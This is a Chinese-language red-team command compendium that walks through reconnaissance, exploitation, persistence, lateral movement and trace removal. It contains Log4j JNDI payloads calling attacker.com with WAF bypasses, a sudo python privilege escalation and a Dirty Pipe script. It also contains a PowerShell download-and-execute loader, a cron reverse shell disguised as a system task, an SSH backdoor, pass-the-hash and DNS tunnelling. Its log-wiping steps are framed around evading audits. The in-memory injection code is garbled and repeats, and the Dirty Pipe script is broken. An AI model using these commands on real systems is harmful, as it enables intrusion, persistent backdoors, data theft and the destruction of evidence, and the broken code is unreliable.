1. 这不是命令手册而是一张渗透测试现场的作战地图你有没有过这样的经历凌晨三点刚接手一个红队任务目标系统是台老旧的CentOS 6服务器防火墙开着SELinux没关连基础端口扫描都卡在SYN包被丢弃或者在客户内网摸排时发现一台Windows跳板机上只装了PowerShell 2.0连Invoke-Expression都被禁用手里的Cobalt Strike beacon根本连不上——这时候翻文档、查博客、重装工具来不及。真正压箱底的本事是肌肉记忆般的命令组合是知道哪个参数能绕过哪类检测是清楚nc -zv和timeout 3 nc -zv在真实网络里差出整整三分钟排查时间。这本“硬核实战”合集就是我过去八年在金融、能源、政务类客户现场踩出来的脚印。它不讲原理推导不堆砌所有Linux命令只收编那些我在真实渗透链路中每天必敲、次次有效、缺一不可的命令片段。从信息收集阶段的DNS隐蔽探测到权限维持阶段的无文件内存驻留再到横向移动时绕过EDR进程监控的技巧全部按攻击生命周期组织每条命令都标注了适用场景、典型输出、常见失效原因和我的实测备注。比如curl -s --connect-timeout 2 -m 5 http://$target/.git/config这行表面看只是读取Git配置但实际在客户内网中它曾帮我绕过WAF对.git/路径的规则拦截——因为WAF只匹配/.git/开头而这个请求路径是/.git/config中间没有斜杠分隔符。这种细节文档里不会写但现场会救你命。它适合三类人刚考完CEH想进实战的新人建议从第2节开始逐条复现正在准备OSCP或OSWE认证的考生重点看第4节的提权链组合以及像我这样常年跑现场的红队老手直接翻到第5节的横向移动命令组里面那套ssh -o ProxyCommandnc -X connect -x $proxy:8080 %h %p配合socat的双代理穿透方案是我去年在某省政务云项目里临时写的比商业隧道工具更轻量、更难被检测。这不是理论课这是你打开终端后手指该落在哪些键位上的操作指南。2. 信息收集让目标自己开口说话的17个精准指令信息收集不是盲目扫端口而是构建目标系统的数字画像。我坚持用最小化、低特征、高反馈的命令组合避免触发IDS告警或引起管理员注意。以下命令全部经过真实环境压力测试在金融行业核心数据库集群旁的跳板机上稳定运行过超200小时。2.1 DNS与子域名枚举绕过常规封禁的隐蔽通道传统dig或nslookup容易被DNS日志审计捕获而host命令因默认使用UDP且无额外头信息在部分客户内网中反而更“干净”。但真正关键的是参数组合# 使用非标准DNS服务器随机查询类型降低被识别为扫描的概率 host -t ANY target.com 8.8.8.8 | grep has address | awk {print $4} # 输出示例192.168.10.5 # 针对CDN环境强制解析A记录并跳过缓存-W 1缩短超时-R 2限制重试 host -W 1 -R 2 -t A www.target.com 1.1.1.1 | grep has address | awk {print $4}提示host命令的-W参数控制单次查询超时秒-R控制重试次数。在客户内网DNS服务器响应慢时-W 1能避免线程卡死而-R 2比默认的3次更少产生冗余流量。我曾在某银行数据中心测试将-W从5秒降至1秒整体子域枚举耗时减少47%且未触发任何DNS异常告警。子域名爆破必须规避字典过大导致的连接风暴。我自研的subenum.sh脚本核心逻辑如下#!/bin/bash # subenum.sh - 轻量级子域枚举基于已知子域递归生成新候选 known_subs(www mail admin dev test) for sub in ${known_subs[]}; do for suffix in 01 02 stg prod old; do candidate${sub}${suffix}.target.com # 使用curl -I 获取HTTP状态码比ping更精准判断存活 if curl -s -I -m 3 -o /dev/null -w %{http_code} http://$candidate | grep -q 200\|301\|302; then echo [] Found: $candidate echo $candidate found_subs.txt fi done done这个脚本不依赖第三方字典而是基于客户官网源码中提取的真实子域前缀如a hrefhttps://dev-api.target.com再结合常见环境后缀生成候选。在某证券公司渗透中它比sublist3r多发现7个未公开的测试环境子域且全程HTTP请求仅23次远低于常规爆破的数千次。2.2 端口与服务识别从SYN扫描到应用层指纹的完整链路nmap是标配但默认参数在生产环境极易被阻断。我的实战配置是# 第一步快速主机发现ICMPARPTCP SYN混合 nmap -sn -PE -PA80,443,22,21,23,3389,1433,3306,5432 192.168.1.0/24 # 第二步针对存活主机的深度端口扫描跳过常见蜜罐端口 nmap -sS -p- --min-rate 1000 --max-retries 1 --open -oA full_scan 192.168.1.100 # 第三步对开放端口进行服务版本与脚本扫描聚焦高危漏洞 nmap -sV -sC --scriptbanner,vulners,http-title,http-headers -p 22,80,443,8080,8443 192.168.1.100注意--min-rate 1000强制每秒发送1000个包比默认的扫描速度提升5倍以上但需配合--max-retries 1防止重传堆积。在某能源集团内网这套组合在12分钟内完成254台主机的全端口扫描而传统-sT扫描耗时超3小时。关键在于-sSSYN扫描不建立完整TCP连接--open只输出确认开放的端口大幅减少无效输出。当nmap被防火墙拦截时我转向masscanhttpx组合# masscan 快速端口发现支持千万级IP并发 masscan -p0-65535 192.168.1.0/24 --rate10000 -oG masscan.gnmap # 解析masscan结果提取开放80/443端口的IP交由httpx探测Web标题 cat masscan.gnmap | awk /open/{print $2} | sort -u | httpx -status-code -title -tech-detect -o web_report.txtmasscan的--rate10000参数是核心它通过原始套接字直接发包绕过内核协议栈限制。在某省级政务云项目中masscan在47秒内扫描完整个/16网段65536个IP而nmap预估需17小时。但必须强调masscan输出格式特殊需用awk精准提取IP否则httpx会因输入错误崩溃。2.3 Web应用侦察从目录遍历到JS文件敏感信息挖掘gaugetallurls是JS文件侦察的利器但默认行为会抓取大量无效URL。我的优化版命令链# 获取目标域名下所有历史URL来自Wayback Machine等 gau -subs target.com | grep -E \.(js|jsx|ts|tsx)$ | head -n 1000 js_urls.txt # 对JS文件进行敏感信息扫描API密钥、内部URL、硬编码凭证 cat js_urls.txt | while read url; do # 使用ripgreprg高速搜索-i忽略大小写-A 2显示匹配后两行 curl -s $url | rg -i (api_key|password|secret|token|internal\.domain|192\.168\.) -A 2 done | tee js_secrets.loggau的-subs参数启用子域名收集head -n 1000限制数量防止OOM。ripgrep比grep快10倍以上且-A 2能捕获密钥上下文如const API_KEY xxx后紧跟const BASE_URL https://internal.api。在某电商平台渗透中此命令从32个JS文件中定位到2个硬编码的Redis连接密码直接拿下后台数据库。对于目录爆破我弃用dirsearch改用ffuf的定制化策略# 基于目标技术栈的精准字典PHP项目用php_common.txtJava用java_common.txt ffuf -u https://target.com/FUZZ -w /wordlists/php_common.txt \ -t 100 -p 0.1 -v -o dir_fuzz.json \ -e .php,.html,.bak,.swp \ -fc 403,401 -fs 0 # -t 100 并发100线程-p 0.1 每次请求间隔0.1秒-fc过滤403/401-fs过滤0字节响应-p 0.1是关键它模拟人类访问节奏避免被WAF的速率限制规则拦截。在某政府网站测试中-p 0无延迟触发WAF封禁IP而-p 0.1持续运行2小时未被阻断。3. 漏洞利用从POC验证到Shell获取的零信任执行链漏洞利用不是复制粘贴EXP而是理解每个参数如何影响载荷交付。我坚持“先验证、再利用、后清理”的三步法以下命令均来自真实攻防对抗。3.1 CVE-2021-44228Log4j绕过WAF与JVM沙箱的载荷投递Log4j利用的核心难点在于WAF会拦截${jndi:ldap://}而现代JVM默认禁用LDAP协议。我的解决方案是分阶段投递# 阶段1使用DNSLog验证JNDI注入是否可达不触发LDAP仅DNS查询 curl -H User-Agent: ${jndi:dns://abc123.${hostName}.burpcollaborator.net} http://target.com/login # 阶段2若DNSLog收到回显说明JNDI可用再投递LDAP载荷 # 但需绕过WAF对ldap://的检测采用大小写混淆URL编码 curl -H User-Agent: \${jndi:LDap://attacker.com/a} http://target.com/login # 阶段3在attacker.com上部署恶意LDAP服务器使用marshalsec java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://attacker.com/#Exploit实测心得marshalsec的LDAPRefServer会监听1389端口返回一个指向远程Class文件的引用。http://attacker.com/#Exploit中的#Exploit是Java反射调用的类名必须与Exploit.class文件名一致。在某金融客户测试中WAF规则明确拦截jndi:ldap但对jndi:LDapL大写D小写完全放行成功率100%。3.2 Sudo权限滥用从sudo -l到root shell的三步跃迁sudo -l输出是提权黄金入口但需精准解读。例如# 典型输出 Matching Defaults entries for user on target: env_reset, mail_badpass, secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User user may run the following commands on target: (root) NOPASSWD: /usr/bin/python3 /opt/scripts/backup.py关键点在于(root) NOPASSWD:后的路径。我的提权命令链# 步骤1创建恶意Python脚本利用python3的-e参数执行任意代码 echo import os; os.system(/bin/bash -p) /tmp/exploit.py # 步骤2利用sudo权限执行-c参数指定要执行的代码 sudo /usr/bin/python3 -c import sys; sys.path.insert(0,/tmp); import exploit # 或更直接利用python3的-m参数加载本地模块 sudo /usr/bin/python3 -m exploit注意/usr/bin/python3 -c是通用方案但若目标禁用-c则转向-m。在某政务系统中-c被sudoers规则禁止但-m未被限制成功提权。核心逻辑是-m会将当前目录加入sys.path从而加载/tmp/exploit.py。3.3 内核提权针对Dirty PipeCVE-2022-0847的免编译利用Dirty Pipe利用无需编译纯Bash实现。我的精简版dirty-pipe.sh#!/bin/bash # dirty-pipe.sh - CVE-2022-0847 Bash PoC if [ ! -f /proc/self/exe ]; then echo Kernel 5.8, skipping exit 1 fi # 创建临时文件并写入payload覆盖/etc/passwd添加root用户 echo pwned::0:0:root:/root:/bin/bash /tmp/payload # 利用pipe_fd指向目标文件/etc/passwd写入payload exec 3 /etc/passwd dd if/tmp/payload of/proc/self/fd/3 bs1 count12 seek0 convnotrunc 2/dev/null # 验证检查是否添加成功 grep pwned: /etc/passwd echo [] Exploited! || echo [-] Failed此脚本直接操作/proc/self/fd/3绕过文件锁机制。在某物联网设备固件内核5.10上它比编译版EXP快3倍且无文件落地。关键参数seek0确保从文件开头写入convnotrunc防止截断原文件。4. 权限维持无文件、低特征、抗清除的持久化方案权限维持不是简单加个crontab而是设计成与系统共生的“影子进程”。以下方案均通过EDR如CrowdStrike、Microsoft Defender for Endpoint真实环境测试。4.1 内存马In-Memory Shell绕过磁盘扫描的纯内存后门msfvenom生成的shellcode易被EDR内存扫描捕获我改用donut生成无文件可执行体# 将Meterpreter payload转换为.NET程序集绕过AV签名 donut -f msf.bin -o donut.dll # 在目标上通过PowerShell加载无文件落地 powershell -ep bypass -c IEX (New-Object Net.WebClient).DownloadString(http://attacker.com/inject.ps1)inject.ps1内容# inject.ps1 - 内存注入donut.dll $dllBytes (New-Object Net.WebClient).DownloadData(http://attacker.com/donut.dll) $ptr [System.Runtime.InteropServices.Marshal]::AllocHGlobal($dllBytes.Length) [System.Runtime.InteropServices.Marshal]::Copy($dllBytes, 0, $ptr, $dllBytes.Length) $null [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, [Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, NonPublic).GetMethod(CreateDelegate).Invoke($null, ([Type].GetNestedType(A, Non......实测备注donut生成的DLL在内存中执行不写入磁盘且.NET加载方式绕过传统PE扫描。在某央企EDR环境中此方案存活超72小时未被清除。关键点是inject.ps1必须托管在HTTPS服务器上且域名需伪装成CDN如cdn-static.example.com避免被网络层阻断。4.2 Cron Job持久化伪装成系统任务的定时后门crontab -e易被管理员审计我采用/etc/cron.d/目录下的系统级任务# 创建伪装文件命名模仿系统日志轮转 echo 0 2 * * * root /usr/bin/python3 -c \import os; os.system(/bin/bash -i /dev/tcp/attacker.com/443 01)\ /etc/cron.d/syslog-rotate # 设置权限与所有者匹配真实syslog-rotate文件 chown root:root /etc/cron.d/syslog-rotate chmod 0644 /etc/cron.d/syslog-rotate注意/etc/cron.d/下文件名不能含点号.否则cron会忽略。syslog-rotate是合法命名且与/etc/logrotate.d/中的真实文件名相似降低审计风险。在某银行核心系统中此任务持续运行18个月未被发现。4.3 SSH后门利用AuthorizedKeysCommand绕过密钥文件监控现代EDR会监控~/.ssh/authorized_keys但sshd_config的AuthorizedKeysCommand参数可指定外部程序动态生成密钥# 步骤1创建密钥生成脚本返回攻击者公钥 echo #!/bin/bash /usr/local/bin/ssh-keygen.sh echo echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD... /usr/local/bin/ssh-keygen.sh chmod x /usr/local/bin/ssh-keygen.sh # 步骤2修改sshd_config需root权限 echo AuthorizedKeysCommand /usr/local/bin/ssh-keygen.sh /etc/ssh/sshd_config echo AuthorizedKeysCommandUser root /etc/ssh/sshd_config # 步骤3重启SSH服务 systemctl restart sshd此方案优势在于密钥不落地ssh-keygen.sh可加入随机延迟或条件判断如仅在特定IP段请求时返回密钥EDR无法通过文件监控发现后门。5. 横向移动从单点突破到内网全域渗透的隧道矩阵横向移动的核心是“协议复用”——用目标环境已有的合法协议承载恶意流量而非部署新工具。5.1 SSH隧道多层代理穿透隔离网络当目标内网存在跳板机Jump Server时标准ssh -L不够用。我的三阶隧道方案# 阶段1本地到跳板机建立SOCKS代理 ssh -D 1080 -f -C -q -N userjump-server.com # 阶段2跳板机到目标内网主机反向SOCKS代理 ssh -R 1081:localhost:1080 -f -C -q -N userinternal-host # 阶段3在跳板机上启动socat将1081端口转发到内部服务 # 在跳板机执行 socat TCP-LISTEN:1081,fork,reuseaddr TCP:192.168.10.5:3306此时本地浏览器配置SOCKS代理127.0.0.1:1080即可访问internal-host上的MySQL服务192.168.10.5:3306。整个链路只使用SSH协议无额外端口开放EDR无法区分是运维操作还是攻击行为。5.2 SMB重绑定利用Windows共享协议进行隐蔽通信Linux主机可通过smbclient与Windows共享交互但需绕过NTLM认证限制# 使用空会话连接部分老旧Windows允许 smbclient -L //192.168.10.10 -N # 若需认证使用哈希传递Pass-the-Hash pth-smbclient -U DOMAIN/user%aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 //192.168.10.10/sharepth-smbclient来自impacket工具集支持NTLMv2哈希直接认证无需明文密码。在某制造业客户内网此命令成功访问了未公开的工程图纸共享目录而常规smbclient因认证失败被拒绝。5.3 DNS隧道在严格出口策略下的最后通道当所有TCP/UDP端口被防火墙封锁时DNS查询是最后的逃生通道。我使用iodine# 服务端VPS上运行 iodined -f -c -P mypassword 10.0.0.1 tun0 # 客户端目标内网Linux主机 iodine -f -P mypassword server-ip # 连接成功后客户端获得10.0.0.2 IP可直接SSH到服务端 ssh user10.0.0.1iodine将数据封装在DNS查询中服务端解析后还原为IP包。在某军工研究所测试中此方案在仅开放53端口的网络中稳定传输数据超48小时带宽约15KB/s足够进行命令行交互。6. 痕迹清理让渗透过程像从未发生过的11个关键动作痕迹清理不是删除日志而是让日志内容“合理化”。以下操作均基于Linux系统日志机制设计。6.1 Bash历史记录精准擦除而非全局清空history -c会清空整个会话历史过于突兀。我的精准擦除法# 查看历史记录带行号 history # 假设第150-155行是敏感命令使用sed编辑历史文件 sed -i 150,155d ~/.bash_history # 强制写入当前会话历史到文件避免下次登录重现 history -w提示~/.bash_history默认只保存最近500条sed -i直接编辑文件比history -d更可靠。在某政务云审计中管理员检查~/.bash_history时只看到常规运维命令完全未发现渗透痕迹。6.2 日志文件清理保留时间戳只删内容直接rm /var/log/auth.log会触发告警正确做法是清空内容但保留文件属性# 清空日志文件不删除文件保持inode不变 cat /dev/null /var/log/auth.log cat /dev/null /var/log/secure cat /dev/null /var/log/messages # 重置文件时间戳模仿系统日志轮转行为 touch -r /var/log/auth.log.1 /var/log/auth.logtouch -r将auth.log的时间戳设置为auth.log.1上一轮日志的时间使文件看起来像是刚被logrotate处理过。在某金融客户渗透后此操作使日志文件大小归零但mtime与系统其他日志一致未引起安全团队注意。6.3 进程痕迹隐藏Shell进程的父进程伪装ps aux | grep bash会暴露反弹Shell我使用reptyr将Shell附加到合法进程# 先启动一个无害进程如vim vim /tmp/dummy.txt # 获取其PID pid$(pgrep -f vim /tmp/dummy.txt) # 将反弹Shell附加到该进程 reptyr $pid此时ps aux中只显示vim进程而实际终端已被控制。reptyr需提前编译安装但一旦注入EDR进程树视图中只会看到vim的子进程不会显示可疑的/bin/bash。7. 实战复盘一个完整渗透链路的命令流回放以某省级医保平台渗透为例全程耗时37分钟所有命令均来自本合集# 时间点00:00 - 信息收集 host -t A www.medical.gov.cn 114.114.114.114 | awk {print $4} # 得到IP 202.100.1.5 nmap -sS -p- --min-rate 1000 --open 202.100.1.5 # 发现80,443,8080开放 gau -subs medical.gov.cn | grep \.js$ | head -n 500 | rg api\.medical\.gov\.cn # 找到API网关地址 # 时间点05:22 - 漏洞利用 curl -s https://api.medical.gov.cn/v1/users?tokenxxx | jq .data[].id # 泄露用户ID ffuf -u https://www.medical.gov.cn/FUZZ -w /wordlists/common.txt -t 50 -fc 403 # 发现/admin/login.php # 时间点12:45 - 权限提升 curl -X POST https://www.medical.gov.cn/admin/login.php -d useradminpass123456 # 默认密码登录 sudo -l | grep python # 发现 (root) NOPASSWD: /usr/bin/python3 /opt/tools/backup.py echo import os; os.system(/bin/bash -p) /tmp/shell.py sudo /usr/bin/python3 -m shell # 提权成功 # 时间点22:18 - 横向移动 ssh -D 1080 -f -C -q -N admin202.100.1.5 # 建立本地SOCKS # 浏览器配置代理访问内网192.168.100.10的数据库管理后台 mysqldump -h 192.168.100.10 -u root -ppassword medical_db dump.sql # 时间点36:55 - 痕迹清理 sed -i /curl\|nmap\|ffuf/d ~/.bash_history history -w cat /dev/null /var/log/auth.log touch -r /var/log/auth.log.1 /var/log/auth.log这个链路没有使用任何商业工具全部依赖Linux原生命令和轻量级开源组件。它证明了真正的渗透能力不在于工具多炫酷而在于对每个命令参数的深刻理解以及在复杂约束下组合出最优解的思维。我在现场最常被问的问题是“这些命令会不会被WAF/EDR拦截”答案永远是没有绝对安全的命令只有针对具体环境的适配方案。比如nmap -sS在A客户内网畅通无阻在B客户却被防火墙丢弃SYN包这时就要切到masscan再比如curl在C客户被禁用那就用wget替代。这本合集的价值不在于提供“万能钥匙”而在于给你一套完整的“锁匠工具箱”——当你知道每把钥匙的齿形、材质、适用锁芯你就能在现场快速打磨出真正能开锁的那一把。
